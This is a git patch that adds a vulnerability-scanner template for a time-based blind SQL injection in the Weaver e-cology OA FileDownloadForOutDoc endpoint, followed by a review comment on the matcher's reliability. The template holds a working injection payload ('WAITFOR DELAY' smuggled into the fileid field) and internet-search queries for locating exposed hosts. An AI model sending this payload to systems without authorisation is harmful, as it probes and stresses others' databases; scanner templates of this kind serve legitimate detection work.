From 6f656fcc2e63e44a324ba1ad076c937b9853ed36 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Fri, 11 Aug 2023 11:14:21 +0530
Subject: [PATCH] Create ecology-oa-file-sqli.yaml
---
 .../other/ecology-oa-file-sqli.yaml | 32 +++++++++++++++++++
 1 file changed, 32 insertions(+)
 create mode 100644 http/vulnerabilities/other/ecology-oa-file-sqli.yaml
diff --git a/http/vulnerabilities/other/ecology-oa-file-sqli.yaml b/http/vulnerabilities/other/ecology-oa-file-sqli.yaml
new file mode 100644
index 0000000000..6398b97fd3
--- /dev/null
+++ b/http/vulnerabilities/other/ecology-oa-file-sqli.yaml
@@ -0,0 +1,32 @@
+id: ecology-oa-file-sqli
+
+info:
+ name: e-cology FileDownloadForOutDocSQL - SQL Injection
+ author: momika233
+ severity: high
+ description: |
+ e-cology did not effectively filter the user input, but directly spliced it into the SQL query statement, resulting in SQL injection vulnerabilities in the system
+ reference:
+ - https://github.com/TgHook/Vulnerability-Wiki/blob/master/docs-base/docs/oa/%E6%B3%9B%E5%BE%AEOA%20e-cology%20FileDownloadForOutDoc%E5%89%8D%E5%8F%B0SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
+ metadata:
+ max-request: 1
+ verified: true
+ shodan-query: ecology_JSessionid
+ fofa-query: app="泛微-协同办公OA"
+ tags: ecology-oa,sqli
+
+http:
+ - raw:
+ - |
+ POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
+ Host: {{Hostname}}
+
+ isFromOutImg=1&fileid=%d+WAITFOR+DELAY+'0:0:5'
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'duration>=5'
+ - 'status_code == 200'
+ - 'contains(set_cookie, "ecology_JSessionid=")'
+ condition: and
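Review bot: The matcher's only evidence of injection is `'duration>=5'`; `'status_code == 200'` and the `ecology_JSessionid=` cookie check merely fingerprint the product, so a host that is slow or rate-limited will be reported as vulnerable even though nothing was injected. A baseline comparison (a second request without the delay, or a wider margin than the exact 5-second wait) would make the time-based verdict more robust, and the `description` should state that this is a blind, time-based check that holds a database worker on the target for five seconds per probe. The body value `fileid=%d+...` is not valid percent-encoding (`%d+` is not a hex pair) and looks like a format placeholder carried over from the reference write-up; this is worth confirming against the reference before merge, since the template is marked `verified: true`. Consider also adding the conventional `classification:` block with `cwe-id: CWE-89` so the finding is categorised consistently with the other sqli templates.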